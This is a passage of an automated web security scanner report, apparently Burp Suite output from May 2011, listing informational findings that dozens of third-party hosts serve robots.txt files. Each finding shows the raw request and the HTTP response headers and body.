Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x412b 16683
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *
29.57. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 07 May 2011 01:19:04 GMT
Expires: Sat, 07 May 2011 01:19:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /
29.58. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Sat, 07 May 2011 01:19:25 GMT
Expires: Sat, 07 May 2011 01:19:25 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.59. http://tours.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tours.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Dec 2008 02:36:27 GMT
ETag: "d309a6d-28-3e4840c0"
Accept-Ranges: bytes
Content-Length: 40
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# robots.txt
User-agent: *
Disallow: /
29.60. http://track.websiteceo.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.websiteceo.com
Path:   /m/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: track.websiteceo.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:24:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 29 May 2003 14:17:06 GMT
ETag: "579-1c-3bece3708dc80"
Accept-Ranges: bytes
Content-Length: 28
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
29.61. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 07 May 2011 01:17:51 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
29.62. http://verify.authorize.net/anetseal/seal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://verify.authorize.net
Path:   /anetseal/seal.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verify.authorize.net

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Wed, 21 Feb 2007 20:25:16 GMT
Accept-Ranges: bytes
ETag: "09eb465f655c71:a13"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 00:54:06 GMT
Connection: close

User-agent: *
Disallow: /
29.63. https://verify.authorize.net/anetseal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://verify.authorize.net
Path:   /anetseal/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: verify.authorize.net

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Last-Modified: Wed, 21 Feb 2007 20:25:16 GMT
Accept-Ranges: bytes
ETag: "09eb465f655c71:85f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI NID NAV"
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:16:27 GMT
Connection: close

User-agent: *
Disallow: /
29.64. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 06 May 2011 20:08:41 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=274 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Sat, 07 May 2011 20:08:40 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /
29.65. http://www.advancedaccess.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advancedaccess.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.advancedaccess.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 06 May 2011 18:39:48 GMT
Content-Length: 6970
Content-Type: text/plain
Last-Modified: Mon, 10 May 2010 18:11:40 GMT
Accept-Ranges: bytes
ETag: "18b3f13c6cf0ca1:586"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: *
Disallow: /Association/
Disallow: /association/
Disallow: /Association/*
Disallow: /association/*
Disallow: /Association
Disallow: /association
Disallow: /car
Disallow: /car/
Di
...[SNIP]...
29.66. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sat, 07 May 2011 01:50:39 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /
29.67. http://www.clone-systems.com/resell-clone-guard.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /resell-clone-guard.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:50:02 GMT
Server: Apache
Last-Modified: Sat, 22 Jan 2011 02:03:43 GMT
ETag: "216011-a8-49a65c6b57dc0"
Accept-Ranges: bytes
Content-Length: 168
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /contrib/
Disallow: /doc/
Disallow: /lib/
Disallow: /modules/
Disallow: /plugins/
Disallow: /scripts/
Disallow: /tmp/
29.68. https://www.clone-systems.com/ecommerce/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.clone-systems.com
Path:   /ecommerce/checkout.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clone-systems.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:57:10 GMT
Server: Apache
Last-Modified: Sat, 22 Jan 2011 02:03:43 GMT
ETag: "216011-a8-49a65c6b57dc0"
Accept-Ranges: bytes
Content-Length: 168
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /contrib/
Disallow: /doc/
Disallow: /lib/
Disallow: /modules/
Disallow: /plugins/
Disallow: /scripts/
Disallow: /tmp/
29.69. http://www.cloneguard.com/pci-scanning.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloneguard.com
Path:   /pci-scanning.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cloneguard.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 20:39:56 GMT
Accept-Ranges: bytes
ETag: "f3d1991494dcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:22:58 GMT
Connection: close
Content-Length: 178

User-agent: *
Disallow: /_private
Disallow: /downloads
Disallow: /pricelists
Disallow: /quickmails
Disallow: /quotes
Disallow: /slmdb
Disallow: /sloggerMDB
Disallow: /old
29.70. http://www.dynamicperimeter.com/styles/i/arrows-ffffff.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dynamicperimeter.com
Path:   /styles/i/arrows-ffffff.png

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dynamicperimeter.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:20:53 GMT
Server: Apache/2.0.52 (Red Hat)
ETag: W/"25-1285316766000"
Last-Modified: Fri, 24 Sep 2010 08:26:06 GMT
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
29.71. http://www.eneighborhoods.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eneighborhoods.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eneighborhoods.com

Response

HTTP/1.1 200 OK
Content-Length: 1624
Content-Type: text/plain
Last-Modified: Thu, 12 Mar 2009 16:12:02 GMT
Accept-Ranges: bytes
ETag: "fa1199472da3c91:660"
Date: Fri, 06 May 2011 18:40:23 GMT
Connection: close
Set-Cookie: TS825c04=68ffaa7c206f4040c40596bb0cacd7bc458ed817a3fec8114dc44124; Path=/

# Robots.txt for eNeighborhoods.com
# Modified by Jackie Robinson 2/03/2009

User-agent: *
Disallow: /2007success/
Disallow: /58freeLeads/
Disallow: /58FreeLeads/
Disallow: /advanced
Disallow:
...[SNIP]...
29.72. http://www.expedia.com/daily/styles/3ColFlex1024.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/styles/3ColFlex1024.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html
ntCoent-Length: 554
Cache-Control: private, max-age=86064
Date: Fri, 06 May 2011 22:33:31 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /daily/common/
Disallow: /cd/
Disallow: /pub/agent.dll?qscr=mrdt
Disallow: /pub/agent.dll?qscr=mrdr
Disallow: /daily/vacations/merch/
Disallow: /daily/ho
...[SNIP]...
29.73. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expedia.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html
Cache-Control: private, max-age=4402
Date: Fri, 06 May 2011 22:40:52 GMT
Content-Length: 554
Connection: close

User-agent: *
Allow: /
Disallow: /daily/common/
Disallow: /cd/
Disallow: /pub/agent.dll?qscr=mrdt
Disallow: /pub/agent.dll?qscr=mrdr
Disallow: /daily/vacations/merch/
Disallow: /daily/ho
...[SNIP]...
29.74. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.136.116.104
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
29.75. http://www.fiddler2.com/fiddler2/updatecheck.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiddler2.com
Path:   /fiddler2/updatecheck.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fiddler2.com

Response

HTTP/1.1 200 OK
Content-Length: 214
Content-Type: text/plain
Content-Location: http://www.fiddler2.com/robots.txt
Last-Modified: Mon, 07 Jul 2008 16:23:49 GMT
Accept-Ranges: bytes
ETag: "4b9ca2d64de0c81:243"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 15:59:18 GMT
Connection: close

...# Mon, 07 Jul 2008 16:23:09 +0000
# Exclude Files From All Robots:
User-agent: *
Disallow: /favecave/
Disallow: /bbs_disabled_by_crystaltech/
Disallow: /CGI-BIN/
Disallow: /test/

# End rob
...[SNIP]...
29.76. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 06 May 2011 17:29:15 GMT
Expires: Fri, 06 May 2011 17:29:15 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
29.77. http://www.google.com/uds/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /uds/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Fri, 06 May 2011 20:08:35 GMT
Expires: Fri, 06 May 2011 20:08:35 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.78. https://www.google.com/searchdomaincheck  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /searchdomaincheck

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Fri, 06 May 2011 17:19:45 GMT
Expires: Fri, 06 May 2011 17:19:45 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.79. http://www.googleadservices.com/pagead/conversion/1070200079/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1070200079/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Sat, 07 May 2011 01:18:17 GMT
Expires: Sat, 07 May 2011 01:18:17 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
29.80. http://www.gotoassist.com/ph/lbmc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gotoassist.com
Path:   /ph/lbmc

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gotoassist.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:34:32 GMT
Server: Apache
Last-Modified: Mon, 07 Feb 2011 10:18:09 GMT
ETag: "b00011-46-49bae8c66ba40"
Accept-Ranges: bytes
Content-Length: 70
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:
Sitemap: http://www.gotoassist.com/sitemap.xml
29.81. http://www.harrisconnect.com/plugins/system/yoo_effects/yoo_effects.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harrisconnect.com
Path:   /plugins/system/yoo_effects/yoo_effects.js.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harrisconnect.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:29:09 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.13
Last-Modified: Thu, 05 Feb 2009 16:26:57 GMT
ETag: "1b75-13f-5f7eb640"
Accept-Ranges: bytes
Content-Length: 319
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Di
...[SNIP]...
29.82. http://www.hunton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hunton.com

Response

HTTP/1.1 200 OK
Content-Length: 107
Content-Type: text/plain
Last-Modified: Fri, 04 Nov 2005 11:54:38 GMT
Accept-Ranges: bytes
ETag: "0533b8836e1c51:f66"
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 23:25:57 GMT
Connection: close
Set-Cookie: BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; path=/

User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
29.83. http://www.lbmc.com/landing/pci.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbmc.com
Path:   /landing/pci.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lbmc.com

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:23:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 08 Dec 2010 19:34:30 GMT
ETag: "69841b-6a7-35be7d80"
Accept-Ranges: bytes
Content-Length: 1703
Cache-Control: max-age=1209600
Expires: Sat, 21 May 2011 01:23:15 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
29.84. http://www.leadlife.com/analytics/lla.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leadlife.com
Path:   /analytics/lla.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leadlife.com

Response

HTTP/1.1 200 OK
Content-Length: 70
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 22:42:42 GMT
Accept-Ranges: bytes
ETag: "a3b526cf98d7cb1:5fff"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:55:40 GMT
Connection: close

User-Agent: *
Disallow: /operations.html
Disallow: operations.html
29.85. http://www.linkedin.com/pub/social-follow/12/7a2/294  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /pub/social-follow/12/7a2/294

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-781835069"
Last-Modified: Wed, 06 Apr 2011 03:23:38 GMT
Content-Length: 24473
Connection: close
Date: Fri, 06 May 2011 17:43:55 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...
29.86. http://www.millersweld.com/error.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millersweld.com
Path:   /error.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.millersweld.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1635438706"
Last-Modified: Tue, 03 May 2011 19:15:58 GMT
Content-Length: 215
Date: Fri, 06 May 2011 19:09:58 GMT
Server: lighttpd

User-agent: *
Disallow: /
Disallow: /sear
Disallow: /imag
Disallow: /redirect.php
Disallow: /site-php/
Disallow: /kwpop.php
Disallow: /uniques.php
Disallow: /contact.php
Disallow: /offer.php
Disallow:
...[SNIP]...
29.87. http://www.millerwelds.com/financing/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.millerwelds.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Date: Fri, 06 May 2011 19:11:28 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-chcfmbmj=47951C0CD46C4FB92B7ADBEB84AF04A7; path=/
Last-Modified: Thu, 13 Jan 2011 19:37:29 GMT
Content-Length: 2368

User-agent: *
Disallow: /*.csi
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /resources/communities/mboard/attachment.php
Disallow: /resources/communities/mboard/ava
...[SNIP]...
29.88. http://www.neospire.net/security-and-compliance/PCI-DSS.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.neospire.net
Path:   /security-and-compliance/PCI-DSS.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.neospire.net

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:22:21 GMT
Server: Apache
Last-Modified: Mon, 21 Feb 2011 18:01:58 GMT
ETag: "600598b-cf-49ccea8ead180"
Accept-Ranges: bytes
Content-Length: 207
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /noc-resume
Disallow: /nocmanager-resume-resulte
Disallow: /nocmanager-resume
Disallow: /noc-internal
Disallow: /billing-resume
sitemap: http://www.neospire.net/xmlsitema
...[SNIP]...
29.89. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:40:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
Last-Modified: Wed, 13 Jan 2010 19:55:02 GMT
ETag: "4808d-3b8-47d112562f180"
Accept-Ranges: bytes
Content-Length: 952
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /cct
Disallow: /404.php
Disallow: /credit_report_services/*
Disallow: /diet_services/link.php?link=weightwatchers
Disallow: /hp
Disallow: /images
Disallow: /identity_t
...[SNIP]...
29.90. http://www.resiteonline.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resiteonline.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.resiteonline.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:52:13 GMT
Server:
Last-Modified: Thu, 18 Sep 2008 14:26:14 GMT
ETag: "5a40b5-1b-4572c5dfecd80"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /

29.91. http://www.sapha.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapha.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sapha.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 16 Jul 2010 01:25:49 GMT
ETag: "d4c016f-1588-1951c140"
Accept-Ranges: bytes
Content-Length: 5512
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

###
# robots.txt file# For domain: http://sapha.com
###


###
#Unsafe robots to keep away
###
User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /


...[SNIP]...
29.92. http://www.scmagazineus.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 15 Apr 2011 20:20:33 GMT
Accept-Ranges: bytes
ETag: "7fb1e092aafbcb1:0"
Server: Microsoft-IIS/7.5
From: Web2-VM
Date: Fri, 06 May 2011 21:49:55 GMT
Connection: close
Content-Length: 364

User-agent: *
Disallow: /search
Disallow: */email/
Disallow: */emailArticle/
Disallow: */emailarticle/
Disallow: */printarticle/
Disallow: */PrintArticle/
Disallow: */emailreview/
Disallow: */
...[SNIP]...
29.93. http://www.scout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.scout.com

Response

HTTP/1.1 200 OK
Content-Length: 135
Content-Type: text/plain
Content-Location: http://www.scout.com/robots.txt
Last-Modified: Wed, 20 Oct 2010 18:48:14 GMT
Accept-Ranges: bytes
ETag: "0abd1598770cb1:67b"
Server: Microsoft-IIS/6.0
Server: Scoutweb10
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 19:29:11 GMT
Connection: close

# Disallow bots from indexing search results
User-agent: *
Disallow: /search.aspx*
Sitemap: http://www.scout.com/sitemapindex.aspx
29.94. http://www.skichalets.co.uk/top/crossfader.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skichalets.co.uk
Path:   /top/crossfader.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skichalets.co.uk

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 18:57:19 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Last-Modified: Tue, 08 Mar 2011 02:14:35 GMT
ETag: "48253-40-49def2c6e18c0"
Accept-Ranges: bytes
Content-Length: 64
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /css/
Disallow: /new_scripts/process.js
29.95. http://www.socialfollow.com/button/image/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.socialfollow.com

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:20 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Fri, 18 Jun 2010 23:36:18 GMT
ETag: "19abdd-165-489566bf12080"
Accept-Ranges: bytes
Content-Length: 357
Connection: close
Content-Type: text/plain

# robots.txt for http://www.socialfollow.com

User-agent: *
Disallow: /cgi-bin/
Disallow: /admin/

User-agent: Fasterfox
Disallow: /

User-agent: aipbot
Disallow: /

User-agent: BecomeBot
Disallow: /

...[SNIP]...
29.96. http://www.sutherlandglobal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sutherlandglobal.com
Path:   /

Issue detail

